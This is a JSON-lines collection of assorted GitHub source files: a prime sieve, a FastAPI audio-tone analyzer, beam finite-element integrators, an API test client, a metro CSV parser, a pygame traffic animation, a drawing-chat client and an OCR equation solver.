+{"seq_id":"36686266546","text":"import math\n# Enumerate all primes between 1 and an integer input argument. \n\nA = 18\ndef primebrute(x):\n primeList = []\n checker = True\n for i in range(2, x):\n for j in range(2,math.floor(math.sqrt(i))+1):\n if i % j !=0:\n checker = True\n elif i % j == 0:\n checker = False\n break\n if checker == True:\n primeList.append(i)\n else:\n checker = True\n return primeList\n \nprint(primebrute(A))\n\n# The above brute force solution is O(n^3/2) time complexity.\n\n# book gives an example of a sieving approach:\n\ndef generate_primes(n):\n primes = []\n isPrime = [False, False] + [True] * (n-1)\n for p in range(2, n+1):\n if isPrime[p]:\n primes.append(p)\n for i in range(p, n+1, p):\n isPrime[i] = False\n return primes\n\nprint(generate_primes(18))\n\n# yields O(n log log n) time because the time it takes to sift is proportional to n/p\n# but the storage is O(n).","repo_name":"linkel/epi-python","sub_path":"Arrays/5.9-enumPrimes.py","file_name":"5.9-enumPrimes.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"37"}
+{"seq_id":"46014360718","text":"# -*- coding: utf-8 -*-\nfrom starlette.middleware.cors import CORSMiddleware\nimport multiprocessing\nimport logging\nimport os\nimport time\nimport wave\nfrom multiprocessing import set_start_method\nfrom detect_noise import noise_detector\nfrom multiprocessing.queues import Queue\nfrom typing import Optional\nfrom scipy.io.wavfile import read, write\nimport numpy as np\nimport math\nimport io\n\nimport uvicorn\nfrom fastapi import Cookie, Depends, FastAPI, Query, WebSocket, status, Request\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi.templating import Jinja2Templates\nimport errno \n\n\n\napp = FastAPI()\nlist_tone = []\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n )\n \nroot = os.path.dirname(__file__)\n\napp.mount('/static', StaticFiles(directory=os.path.join(root, 'static')), name='static')\n\ntemplates = Jinja2Templates(directory=os.path.join(root, 'template'))\n \n \ndef change_to_mathfloor(num):\n return math.floor(num*10)/10\n \ndef conv_to_int(num):\n if (num >= 1.0):\n new = 32767\n elif (num <= -1.0):\n new = -32768\n else:\n new = num * 32768.0\n return int(new)\n \ndef monotone():\n global list_tone\n new_list = [change_to_mathfloor(tone) for tone in list_tone]\n small_change = 0\n big_change = 0\n high = 0\n low = 0\n good = 0\n for i in range(2,len(list_tone)-1):\n \n if round(new_list[i+1] - new_list[i],1) in [0.1,-0.1]:\n small_change += 1\n if round(new_list[i+1] - new_list[i],1) <= -0.2 or round(new_list[i+1] - new_list[i],1) >= 0.2:\n big_change += 1\n if new_list[i] >= 0.4:\n high += 1\n elif new_list[i] <= 0.1:\n low += 1\n else:\n good += 1\n \n return small_change, high, low, good,big_change\n \n \ndef result_tone():\n global list_tone\n small_change, high, low, good, big_change = monotone()\n if good < 0.5*(len(list_tone)-3) and small_change <= 0.5*(len(list_tone)-2):\n return \"#\"*80+\"\\n\" +\" \"*40+\"Results:\\n Apathetic Tone\\n\"\n if good >= 0.5*(len(list_tone)-3) and small_change+big_change >= 0.3*(len(list_tone)-2):\n return \"#\"*80+\"\\n\" +\" \"*40+\"Results:\\n That was good\\n\"\n if high >= 0.5*(len(list_tone)-3):\n return \"#\"*80+\"\\n\"+\" \"*40+\"Results:\\n High voice\\n\"\n if low >= 0.5*(len(list_tone)-3):\n return \"#\"*80+\"\\n\"+\" \"*40+\"Results:\\n Low voice\\n\"\n\n@app.get(\"/\")\nasync def get(request: Request):\n return templates.TemplateResponse('index.html', {'request': request})\n \ndef wav_worker(q: Queue, uid: str, ):\n root = os.path.join(os.path.dirname(__file__), 'upload_waves')\n os.makedirs(root, exist_ok=True)\n filename = os.path.join(root, f'{uid}_{time.time()}.wav')\n try:\n wav = wave.open(filename, mode='wb')\n wav.setframerate(16000)\n wav.setnchannels(1)\n wav.setsampwidth(2)\n\n while True:\n data_bytes = q.get()\n wav.writeframes(data_bytes)\n print(f'q.get {len(data_bytes)}')\n\n except Exception as e:\n logging.debug(e)\n finally:\n wav.close()\n\n logging.info('leave wav_worker')\n\n\n@app.websocket(\"/items/{item_id}/ws\")\nasync def websocket_signal_process(websocket: WebSocket, item_id: str, q: Optional[int] = None):\n global list_tone\n await websocket.accept()\n logging.info('websocket.accept')\n #while True:\n # data = await websocket.receive_text()\n # await websocket.send_text(f\"Message text was: {data}\")\n \n #ctx = multiprocessing.get_context()\n #queue = ctx.Queue()\n #process = ctx.Process(target=wav_worker, args=(queue, item_id))\n #process.start()\n 
counter = 0\n start1 = time.time()\n start2 = time.time()\n arr = []\n #arr_int = []\n message = \"\"\n message2 = \"\"\n try:\n while True:\n \n data = await websocket.receive()\n end1 = time.time()\n end2 = time.time()\n time_spent1 = end1 - start1\n time_spent2 = end2 - start2\n #print(time_spent1)\n # take a string of floats and convert it to list of floats '1.22,1.33' ==> ['1.33','1.233']\n data_array = data['text'].split(',')\n \n # convert the array items from string to floats ['1.33','1.233'] ==> [1.33,1.233]\n data_array = list(map(float, data_array))\n arr.extend(data_array)\n #arr_int.extend([conv_to_int(num) for num in data_array])\n \n if int(time_spent1) == 2:\n print(\"2 seconds passed\")\n start1 = end1\n maxElement = max(arr)\n list_tone.append(maxElement)\n message = noise_detector(arr,16000)\n arr = []\n print(list_tone)\n \n await websocket.send_text(message)\n if int(time_spent2) == 30:\n start2 = end2\n #speech_feature_detector(arr_int)\n #arr_int = []\n message2 = result_tone()\n await websocket.send_text(message2)\n list_tone = []\n if q is not None:\n await websocket.send_text(f\"Query parameter q is: {q}\")\n #await websocket.send_text(f\"Message text was: {data_array}, for item ID: {item_id}\")\n \n #queue.put(data_array)\n counter += 1\n\n except Exception as e:\n logging.debug(e)\n #finally:\n # Wait for the worker to finish\n \n #queue.close()\n #queue.join_thread()\n # use terminate so the while True loop in process will exit\n #process.terminate()\n #process.join()\n logging.info('leave websocket_endpoint')\n \nif __name__ == '__main__':\n # When using spawn you should guard the part that launches the job in if __name__ == '__main__':.\n # `set_start_method` should also go there, and everything will run fine.\n try:\n set_start_method('spawn')\n except RuntimeError as e:\n print(e)\n\n uvicorn.run('main:app', host='localhost', reload=True)\n","repo_name":"yasmine1998/Audio-Analyzer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"40710189124","text":"import numpy as np\n\nfrom .truss_structure_integrator import TrussStructureIntegrator\n\n\nclass EulerBernoulliBeamStructureIntegrator:\n def __init__(self, E, I, q = 3):\n \"\"\"\n EulerBermoulliBeamStructureIntegrator 类的初始化\n\n 参数:\n E -- 杨氏模量\n I -- 惯性矩\n q -- 积分公式的等级,默认值为3\n \"\"\"\n self.E = E\n self.I = I\n self.q = q \n\n def assembly_cell_matrix(self, space, index = np.s_[:], \n cellmeasure = None, out = None):\n \"\"\"\n 组装单元刚度矩阵\n\n 参数:\n space -- 空间维度的元组\n index -- 单元网格的索引,默认为全部单元\n cellmeasure -- 单元的度量,默认为 None,表示使用默认度量\n out -- 输出的数组,默认为 None,表示创建新数组\n\n 返回值:\n 组装好的单元网格刚度矩阵\n \"\"\"\n assert isinstance(space, tuple) \n space0 = space[0]\n mesh = space0.mesh\n GD = mesh.geo_dimension()\n\n assert len(space) == GD\n\n if cellmeasure is None:\n cellmeasure = mesh.entity_measure('cell', index=index)\n\n l = cellmeasure\n c = self.E * self.I\n\n NC = len(cellmeasure)\n ldof = 2 # 一个单元两个自由度, @TODO 高次元的情形?本科毕业论文\n if out is None:\n K = np.zeros((NC, GD*ldof, GD*ldof), dtype=np.float64)\n else:\n assert out.shape == (NC, GD*ldof, GD*ldof)\n K = out\n\n K_values = np.array([\n [12, 6, -12, 6],\n [6, 4, -6, 2],\n [-12, -6, 12, -6],\n [6, 2, -6, 4]\n ], dtype=np.float64)\n\n K_values[1, [1, 3]] *= l\n K_values[3, [1, 3]] *= l\n\n K_matrix = K_values[np.newaxis, :, :]\n\n K = (c / l**3)[:, np.newaxis, np.newaxis] * K_matrix\n\n if out is None:\n return K\n\n\nclass TimoshenkoBeamStructureIntegrator:\n def __init__(self, E, I, A, q = 3):\n \"\"\"\n TimoshenkoBeamStructureIntegrator 类的初始化\n\n 参数:\n E -- 杨氏��量\n I -- 惯性矩\n A -- 梁的横截面积\n q -- 积分公式的等级,默认值为3\n \"\"\"\n self.E = E\n self.I = I\n self.A = A\n self.q = q \n\n self.truss_integrator = TrussStructureIntegrator(E, A, q)\n self.euler_bernoulli_integrator = EulerBernoulliBeamStructureIntegrator(E, I, q)\n\n def assembly_cell_matrix(self, space, index = np.s_[:],\n cellmeasure = None, out = None):\n \"\"\"\n 组装单元网格的刚度矩阵\n\n 参数:\n space -- 空间维度的元组\n index -- 单元网格的索引,默认为全部单元\n cellmeasure -- 单元的度量,默认为 None,表示使用默认度量\n out -- 输出的数组,默认为 None,表示创建新数组\n\n 返回值:\n 组装好的单元网格刚度矩阵\n \"\"\"\n assert isinstance(space, tuple) \n space0 = space[0]\n mesh = space0.mesh\n GD = mesh.geo_dimension()\n\n assert len(space) == GD\n\n if cellmeasure is None:\n cellmeasure = mesh.entity_measure('cell', index=index)\n\n NC = len(cellmeasure)\n\n K_truss = self.truss_integrator.assembly_cell_matrix(space, index, cellmeasure, out)\n K_euler_bernoulli = self.euler_bernoulli_integrator.assembly_cell_matrix(space, index, cellmeasure, out)\n print(\"K_truss:\\n\", K_truss)\n print(\"K_euler_bernoulli:\\n\", K_euler_bernoulli)\n\n c1 = self.E*self.A\n c2 = self.E*self.I\n tan = mesh.cell_unit_tangent(index=index) # 计算单元的单位切向矢量(即轴线方向余弦)\n\n","repo_name":"weihuayi/fealpy","sub_path":"fealpy/fem/beam_structure_integrator.py","file_name":"beam_structure_integrator.py","file_ext":"py","file_size_in_byte":3802,"program_lang":"python","lang":"en","doc_type":"code","stars":209,"dataset":"github-code","pt":"37"}
+{"seq_id":"69977512107","text":"Import('env prefix')\nlib_name = 'numlib_integration'\n\nsrc = (\n\t'Quadrature.cpp',\n)\n\nheaders = (\n\t'Quadrature.h',\n\t'QuadRule.h',\n)\n\nlib = env.StaticLibrary(lib_name, src)\n\nenv.Install(prefix+'/lib', lib)\nenv.Install(prefix+'/include/numlib/integration', headers)\n","repo_name":"bsilbaugh/NumLib","sub_path":"src/integration/SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"74812808746","text":"import loguru\nimport requests\nimport time\n\n\ndef req(url):\n response = requests.get(url=url)\n text = response.text\n url = response.url\n \n return text, response, url\n\ndef log(url):\n time1 = time.time()\n\n request = req(url)\n\n time2 = time.time()\n total_time = time2 - time1\n\n loguru.logger.success(f'{request[1]}, url: {request[2]} execution time: {total_time}')\n\nif __name__ == '__main__':\n log(input('Enter url: '))\n","repo_name":"adolff4ik/simple_loguru","sub_path":"loguru_requests.py","file_name":"loguru_requests.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"40303991126","text":"\n# 0 : prev[0]=0\n# 1 : 0 pos = 0 start = 0 prev[1]=0 0\n# 2 : 1 4 pos = 0 1 start = 1 prev[2]=1 1 2\n# 3 : 9 0 1 pos = 0 1 2 start = 9 prev[3]=3 3 4 5\n# 4 : 4 9 0 1 pos = 0 1 2 3 start = 4 prev[4]=6 6 7 8 9 = índices\n# 5 : 4 9 0 1 4 pos = 0 1 2 3 4 start = 4 prev[5]=10 ...\n# 6 : 9 0 1 4 9 0 pos = 0 1 2 3 4 5 start = 9 prev[6]=15\n# ...\n\n# 0=0^2\n# 1=1^2\n# 4=2^2\n# 9=3^2\n\n# | 00 | 01 02 | 03 04 05 | 06 07 08 09 | 10 11 12 13 14 | 15 16 17 18 19 20 | = índices\n# | 0 | 1 4 | 9 0 1 | 4 9 0 1 | 4 9 0 1 4 | 9 0 1 4 9 0 | = elemento correspondiente según índice '(elem%4)**2'\n\nprev,num_line=[0],500 # 500 lineas.\n\ndef max_path(num_line):\n prev=[0] # prev[k] cantidad de elementos antes de la linea 'k' que es lo mismo que el índice del primer elemento en la linea 'k'.\n for ind in range(1,num_line+1): prev.append(ind-1+prev[-1])\n line=[(elem%4)**2 for elem in range(prev[num_line],prev[num_line]+num_line)] # última linea en la pirámide\n while num_line>1: # calcula máximos de a pares y se suman al elemento en la linea anterior hasta llegar al inicio.\n line=[max(line[ind],line[ind+1])+((prev[num_line-1]+ind)%4)**2 for ind in range(0,num_line-1)]\n num_line=num_line-1 # siguiente linea hacia arriba.\n return line[0]\n\nprint(max_path(num_line))\n\n# max_path(500)=3491\n","repo_name":"arcisd/TestEL-Definido","sub_path":"test3.py","file_name":"test3.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"24645259024","text":"from cafe.engine.http.client import AutoMarshallingHTTPClient\nfrom cloudcafe.meniscus.tenant_api.models.tenant import \\\n Tenant, CreateTenant, ResetToken\nfrom cloudcafe.meniscus.tenant_api.models.producer import \\\n CreateProducer, UpdateProducer, AllProducers, Producer\n\n\nclass MeniscusClient(AutoMarshallingHTTPClient):\n\n def __init__(self, url, api_version, use_alternate=False,\n serialize_format=None, deserialize_format=None):\n super(MeniscusClient, self).__init__(serialize_format,\n deserialize_format)\n self.url = url\n self.api_version = api_version\n self.use_alternate = use_alternate\n\n def _get_base_url(self):\n if not self.use_alternate:\n url = '{base}/{version}/tenant'.format(base=self.url,\n version=self.api_version)\n else:\n url = '{base}/{version}'.format(base=self.url,\n version=self.api_version)\n return url\n\n\nclass TenantClient(MeniscusClient):\n\n def create_tenant(self, tenant_id):\n \"\"\"\n @summary: Creates a tenant with the given id\n @param tenant_id:\n \"\"\"\n url = self._get_base_url()\n resp = self.request('POST', url,\n request_entity=CreateTenant(tenant_id))\n return resp\n\n def get_tenant(self, tenant_id):\n \"\"\"\n @summary: Retrieves the version information from the API\n \"\"\"\n url = '{base}/{tenant_id}'.format(base=self._get_base_url(),\n tenant_id=tenant_id)\n resp = self.request('GET', url, response_entity_type=Tenant)\n return resp\n\n def validate_token(self, tenant_id, msg_token, worker_id, worker_token):\n \"\"\"\n HEAD /v1/{tenant_id}/token\n @summary: Checks to see if the token is valid\n \"\"\"\n url = '{base}/{tenant_id}/token'.format(base=self._get_base_url(),\n tenant_id=tenant_id)\n headers = {\n 'MESSAGE-TOKEN': msg_token,\n 'WORKER-ID': worker_id,\n 'WORKER-TOKEN': worker_token\n }\n return self.request('HEAD', url, headers=headers)\n\n def reset_token(self, tenant_id, invalidate_now):\n \"\"\"\n POST /v1/{tenant_id}/token\n @summary: Should activate the reset token functionality.\n \"\"\"\n url = '{base}/{tenant_id}/token'.format(base=self._get_base_url(),\n tenant_id=tenant_id)\n req_obj = ResetToken(invalidate_now)\n return self.request('POST', url, request_entity=req_obj)\n\n\nclass ProducerClient(MeniscusClient):\n def __init__(self, url, api_version, tenant_id, use_alternate=False,\n serialize_format=None, deserialize_format=None):\n super(ProducerClient, self).__init__(url, api_version,\n use_alternate, serialize_format,\n deserialize_format)\n self.tenant_id = tenant_id\n\n def _generate_producer_url(self, producer_id):\n remote_url = '{base}/{tenant_id}/producers/{producer_id}'\\\n .format(base=self._get_base_url(),\n tenant_id=self.tenant_id,\n producer_id=producer_id)\n return remote_url\n\n def create_producer(self, name=None, pattern=None,\n durable=None, encrypted=None):\n \"\"\"\n POST /{api_version}/{tenant_id}/producers\n @summary: Creates a new producer on a tenant\n \"\"\"\n\n request_producer = CreateProducer(\n producer_name=name,\n producer_pattern=pattern,\n producer_durable=durable,\n producer_encrypted=encrypted)\n\n url = '{base}/{tenant_id}/producers'.format(\n base=self._get_base_url(),\n version=self.api_version,\n tenant_id=self.tenant_id)\n\n producer_request = self.request('POST', url,\n request_entity=request_producer)\n\n return producer_request\n\n def delete_producer(self, producer_id):\n \"\"\"\n DELETE /{app_version}/{tenant_id}/producers/{producer_id}\n @summary: Removes a producer from a tenant\n \"\"\"\n remote_url = 
self._generate_producer_url(producer_id)\n response = self.request('DELETE', remote_url)\n\n return response\n\n def update_producer(self, producer_id, name=None, pattern=None,\n durable=None, encrypted=None):\n \"\"\"\n PUT /{app_version}/{tenant_id}/producers/{producer_id}\n @summary: Updates a producer\n \"\"\"\n producer_obj = UpdateProducer(producer_name=name,\n producer_pattern=pattern,\n producer_durable=durable,\n producer_encrypted=encrypted)\n remote_url = self._generate_producer_url(producer_id)\n response = self.request('PUT', remote_url, request_entity=producer_obj)\n return response\n\n def get_producer(self, producer_id):\n \"\"\"\n GET /{app_version}/{tenant_id}/producers/{producer_id}\n @summary: Retrieves a Producer on a tenant\n \"\"\"\n remote_url = self._generate_producer_url(producer_id)\n response = self.request('GET', remote_url,\n response_entity_type=Producer)\n return response\n\n def get_all_producers(self):\n \"\"\"\n GET /{app_version}/{tenant_id}/producers\n @summary: Retrieves all producers on a given tenants\n \"\"\"\n remote_url = '{base}/{tenant_id}/producers'.format(\n base=self._get_base_url(),\n tenant_id=self.tenant_id)\n\n response = self.request('GET', remote_url,\n response_entity_type=AllProducers)\n return response\n","repo_name":"jcourtois/rpc9_cloudcafe","sub_path":"cloudcafe/meniscus/tenant_api/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":6013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"71639186026","text":"# -*- coding: utf-8 -*-\r\n\r\n############ Imports ############\r\n\r\nfrom collections import OrderedDict\r\n\r\n############ Fonctions fichiers ############\r\n\r\ndef listeMetroCsv(Fname):\r\n \"\"\"\r\n Fonction qui lit un fichier .csv et qui en extrait le nom de la station,\r\n sa ligne et sa place sur cette dernière.\r\n \"\"\"\r\n F = open(Fname)\r\n L1, L2, L3 = [], [], []\r\n for l in F.readlines()[1:]: # on exclue la première ligne\r\n ptdata = l.split(sep=';')\r\n i=0\r\n for ptd in ptdata :\r\n ptdata[i] = str(ptd)\r\n i+=1\r\n L1.append(ptdata)\r\n \r\n for var in L1:\r\n for i in range (0,3):\r\n L2.append(var[i])\r\n L3.append(L2)\r\n L2=[]\r\n \r\n F.close()\r\n return L3\r\n \r\ndef listeMetroCsvStation(Fname):\r\n \"\"\"\r\n Fonction qui lit un fichier .csv et qui en extrait le nom des stations.\r\n \"\"\"\r\n F = open(Fname)\r\n L1, L2, L3 = [], [], []\r\n for l in F.readlines()[1:]: # on exclue la première ligne\r\n ptdata = l.split(sep=';')\r\n i=0\r\n for ptd in ptdata :\r\n ptdata[i] = str(ptd)\r\n i+=1\r\n L1.append(ptdata)\r\n \r\n for var in L1:\r\n L2.append(var[1])\r\n \r\n F.close()\r\n return L2\r\n\r\ndef listeMetroCsvInfos(Fname):\r\n \"\"\"\r\n Fonction qui lit un fichier .csv et qui en extrait les données choisies préalablement.\r\n \"\"\"\r\n F = open(Fname)\r\n L1, L2, L3 = [], [], []\r\n for l in F.readlines()[1:]: # on exclue la première ligne\r\n ptdata = l.split(sep=';')\r\n i=0\r\n for ptd in ptdata :\r\n ptdata[i] = str(ptd)\r\n i+=1\r\n L1.append(ptdata)\r\n \r\n for var in L1:\r\n for i in [0,-3,-2]:\r\n if i==-3:\r\n L2.append(((int(var[i].split(sep='-')[0])+int(var[i].split(sep='-')[1]))/2)*60)\r\n else:\r\n L2.append(var[i])\r\n L3.append(L2)\r\n L2=[]\r\n\r\n F.close()\r\n return L3\r\n\r\n\r\ndef dictMetroCsv(l):\r\n \"\"\"\r\n Fonction qui retourne un dictionnaire des stations triées par ligne.\r\n \"\"\"\r\n registre=dict()\r\n temp=dict()\r\n l1,l2,l3,l3b,l4,l5,l6,l7,l7b,l8,l9,l10,l11,l12,l13,l14=[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[]\r\n \r\n for var in l:\r\n if var[0]==\"M1\":\r\n l1.append(var[1])\r\n if var[0]==\"M2\":\r\n l2.append(var[1])\r\n if var[0]==\"M3\":\r\n l3.append(var[1])\r\n if var[0]==\"M3b\":\r\n l3b.append(var[1])\r\n if var[0]==\"M4\":\r\n l4.append(var[1])\r\n if var[0]==\"M5\":\r\n l5.append(var[1])\r\n if var[0]==\"M6\":\r\n l6.append(var[1])\r\n if var[0]==\"M7\":\r\n l7.append(var[1])\r\n if var[0]==\"M7b\":\r\n l7b.append(var[1])\r\n if var[0]==\"M8\":\r\n l8.append(var[1])\r\n if var[0]==\"M9\":\r\n l9.append(var[1])\r\n if var[0]==\"M10\":\r\n l10.append(var[1])\r\n if var[0]==\"M11\":\r\n l11.append(var[1])\r\n if var[0]==\"M12\":\r\n l12.append(var[1])\r\n if var[0]==\"M13\":\r\n l13.append(var[1])\r\n if var[0]==\"M14\":\r\n l14.append(var[1])\r\n temp[\"M1\"]=l1\r\n temp[\"M2\"]=l2\r\n temp[\"M3\"]=l3\r\n temp[\"M3b\"]=l3b\r\n temp[\"M4\"]=l4\r\n temp[\"M5\"]=l5\r\n temp[\"M6\"]=l6\r\n temp[\"M7\"]=l7\r\n temp[\"M7b\"]=l7b\r\n temp[\"M8\"]=l8\r\n temp[\"M9\"]=l9\r\n temp[\"M10\"]=l10\r\n temp[\"M11\"]=l11\r\n temp[\"M12\"]=l12\r\n temp[\"M13\"]=l13\r\n temp[\"M14\"]=l14\r\n \r\n registre = OrderedDict(sorted(temp.items(), key=lambda t: t[0]))\r\n\r\n return registre\r\n","repo_name":"are00dynamic-2018/RATP_Project","sub_path":"src/LibMetroCsv_NB.py","file_name":"LibMetroCsv_NB.py","file_ext":"py","file_size_in_byte":3599,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"8290180073","text":"n1 = int(input(\"Digite o primeiro número: \"))\nn2 = int(input(\"Digite o segundo número: \"))\na = n1 + n2\ns = n1 - n2\nm = n1 * n2\nd = n1 / n2\np = n1 ** n2\ndi = n1 // n2\nrd = n1 % n2\nprint(\" Os resultados são: \\n adição {}, \\n subtracão {}, multiplicação {}, divisão {:.3f} \".format(a, s, m, d), end=\" >>> \")\nprint(\"Os resultados restantes são: potenciação {}, divisão inteira {} e resto da divisão {} \".format(p, di, rd))\n\n\n\n\n\n\n","repo_name":"Lucas-Urbano/Python_Start","sub_path":"aula07a.py","file_name":"aula07a.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"73777756908","text":"import pygame\r\nimport random\r\nfrom random import randint\r\n\r\nprint()\r\nprint()\r\nprint()\r\nprint(\"Together we'll build a busy city full of traffic today!\")\r\nscreenx = int(input(\"Choose the horizontal resolution of the game: \"))\r\nscreeny = int(input(\"Choose the vertical resolution of the game: \"))\r\npygame.init() # Prepare pygame\r\nclock = pygame.time.Clock() # To set game speed\r\nscreen = pygame.display.set_mode((screenx, screeny))\r\ncarwidth = int(input(\"Choose how large you want your car to be (square side): \"))\r\n\r\ncar = pygame.image.load('car_sprites.png')\r\ncar = pygame.transform.scale(car, (8 * carwidth, carwidth))\r\n\r\ntypecarfw = [0, carwidth*2, carwidth*4, carwidth*6] #backwards\r\ntypecarbw = [carwidth, carwidth*3, carwidth*5, carwidth*7] #forwards\r\nstreets = int(input(\"How many streets do you want? \"))\r\nrows = streets * 2\r\n\r\nprint(\"I'll do the hard work of selecting how large are the rivers between the streets!\")\r\nclock.tick(1)\r\nok = input(\"Is that ok for you? Y/N: \")\r\nif ok == 'y' or ok == 'Y' :\r\n \r\n rivers = []\r\n for street in range(streets):\r\n rivers.append(random.randint(0, 9))\r\n\r\nelse:\r\n rivers = []\r\n print(\"This is your list of how large you want the rivers to be, yet..\", rivers)\r\n clock.tick(1)\r\n print(\"This is your mission: insert how large you want every river to be\")\r\n print(\"0 means no river; 1 means that the river is large as the cars; 2 means the river is twice the cars\")\r\n print(\"And so on...\")\r\n for street in range(streets):\r\n rivers.append(int(input(\"Choose how large do you want the river \" + str(street + 1) + \" to be: \")))\r\n print(\"Well done!\")\r\n \r\nprint(\"Now see it in action!\")\r\n\r\ncarrow = []\r\n\r\n\r\nfor row in range(rows):\r\n \r\n if row == 0:\r\n carrow.append(carwidth)\r\n else:\r\n if row%2 ==1:\r\n carrow.append(carrow[row-1] + carwidth + carwidth // 8)\r\n if row%2 == 0:\r\n if rivers[row//2] == 0:\r\n carrow.append(carrow[row-1] + carwidth * (rivers[row//2] + 1) + carwidth // 8)\r\n else:\r\n carrow.append(carrow[row-1] + carwidth * (rivers[row//2] + 1))\r\n\r\n\r\n\r\n\r\n#cars = [7, 5, 2, 3] numero di macchine per corsia, la lunghezza della lista corrisponde al numero di corsie\r\ncars = []\r\nfor k in range(rows):\r\n cars.append(randint(1, 9))\r\ndistance = []\r\nfor r in range(rows):\r\n distance.append((screenx + carwidth) // cars [r])\r\ncarinrowbw=[]\r\ncarinrowfw=[]\r\n\r\n\r\nfor k in range(9):\r\n carinrowbw.append(random.choice(typecarbw))\r\nfor k in range(9):\r\n carinrowfw.append(random.choice(typecarfw))\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\nplaying = True\r\nwhile playing:\r\n for e in pygame.event.get(): # Handle events: mouse, keyb etc.\r\n if e.type == pygame.QUIT: playing = False\r\n \r\n for mov in range(screenx + carwidth):\r\n \r\n screen.fill((255, 255, 255))\r\n for r in range(rows):\r\n pygame.draw.rect(screen, (40,43,42), (0, carrow[r], screenx, carwidth))\r\n \r\n x = 0\r\n for a in range(screenx + carwidth // carwidth):\r\n for r in range(0, rows, 2):\r\n \r\n pygame.draw.rect(screen, (40, 43, 42), (x, carrow[r] + carwidth, carwidth, carwidth // 8))\r\n \r\n x += carwidth*2\r\n for row in range(rows):\r\n if row%2 == 0:\r\n x = -mov\r\n for i in range(cars[row]):\r\n if -carwidth <= x < 0:\r\n screen.blit(car, (x, carrow[row]), area=(carinrowbw[i], 0, carwidth, carwidth))\r\n x += distance[row]\r\n else:\r\n screen.blit(car, (x % (screenx + carwidth), carrow[row]), area=(carinrowbw[i], 0, 
carwidth, carwidth))\r\n x += distance[row]\r\n elif row%2 == 1:\r\n x = mov\r\n for i in range(cars[row]):\r\n if screenx <= x < (screenx + carwidth):\r\n screen.blit(car, (x - (screenx + carwidth), carrow[row]), area=(carinrowfw[i], 0, carwidth, carwidth))\r\n x += distance[row]\r\n else:\r\n \r\n screen.blit(car, (x % (screenx + carwidth), carrow[row]), area=(carinrowfw[i], 0, carwidth, carwidth))\r\n x += distance[row]\r\n \r\n \r\n \r\n \r\n pygame.display.flip()\r\n\r\n \r\npygame.quit() \r\nquit()\r\n","repo_name":"cad0p/froggah","sub_path":"froggah.py","file_name":"froggah.py","file_ext":"py","file_size_in_byte":4477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"1627012417","text":"#!/usr/bin/env python3\nimport json\nimport re\nimport socket\nimport sys\nfrom threading import Thread\n\nimport drawing\n\n\ndef my_parse_url(url):\n if (url[:12] != 'pictochat://'):\n return (None, None)\n url = url[12:]\n if (not re.search(r'^[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}(\\:[0-9]{1,4})?\\/?$', url)):\n return (None, None)\n foo = url.split(':')\n if (foo[1][-1] == '/'):\n foo[1] = foo[1][:-1]\n return (foo[0], int(foo[1]))\n\n\ndef main(argv):\n if (len(argv) > 2):\n sys.stderr.write('usage: %s [url]' % argv[0])\n sys.exit(1)\n if (len(argv) == 2):\n host, port = my_parse_url(argv[1])\n else:\n host = None\n port = None\n try:\n f = open('config.json', 'r')\n d = json.loads(f.read())\n except FileNotFoundError:\n d = None\n if (host is None or port is None):\n try:\n host = d['host']\n except (TypeError, KeyError):\n host = input('host: ')\n try:\n port = int(d['port'])\n except (TypeError, KeyError, ValueError):\n port = int(input('port: '))\n if (d is None):\n d = {\n 'host': host,\n 'port': port,\n }\n f = open('config.json', 'w')\n f.write(json.dumps(d))\n f.close()\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n s.connect((host, port))\n except ConnectionRefusedError:\n print('failed to connect to server')\n sys.exit(1)\n print('connected')\n drawing.main(s)\n\n\nif (__name__ == '__main__'):\n main(sys.argv)\n","repo_name":"byron123t/PictoRoom","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
+{"seq_id":"39565405899","text":"from PIL import Image\nfrom pytesseract import *\nimport Ecuacion\n\nclass ImagenAEcuacion:\n def __init__(self,direccionImagen): \n pytesseract.tesseract_cmd=r'C:\\Users\\User\\AppData\\Local\\Programs\\Tesseract-OCR\\tesseract.exe'\n\n img=Image.open(direccionImagen)\n resultado=pytesseract.image_to_string(img,lang='eng+equ+osd')\n print(\"IA: \"+resultado)\n resultado=resultado.replace('%','^')\n resultado=resultado.replace('*','^',1)\n resultado=resultado.replace('\f','')\n print(\"Casteo: \"+resultado)\n iniciador=Ecuacion.ResolverEcuacion(resultado)\n self.ecuacion=iniciador.ecuacion\n self.resultado=iniciador.resultado","repo_name":"AlexanderNT24/SolucionCuadraticaPython","sub_path":"IAImagenes.py","file_name":"IAImagenes.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
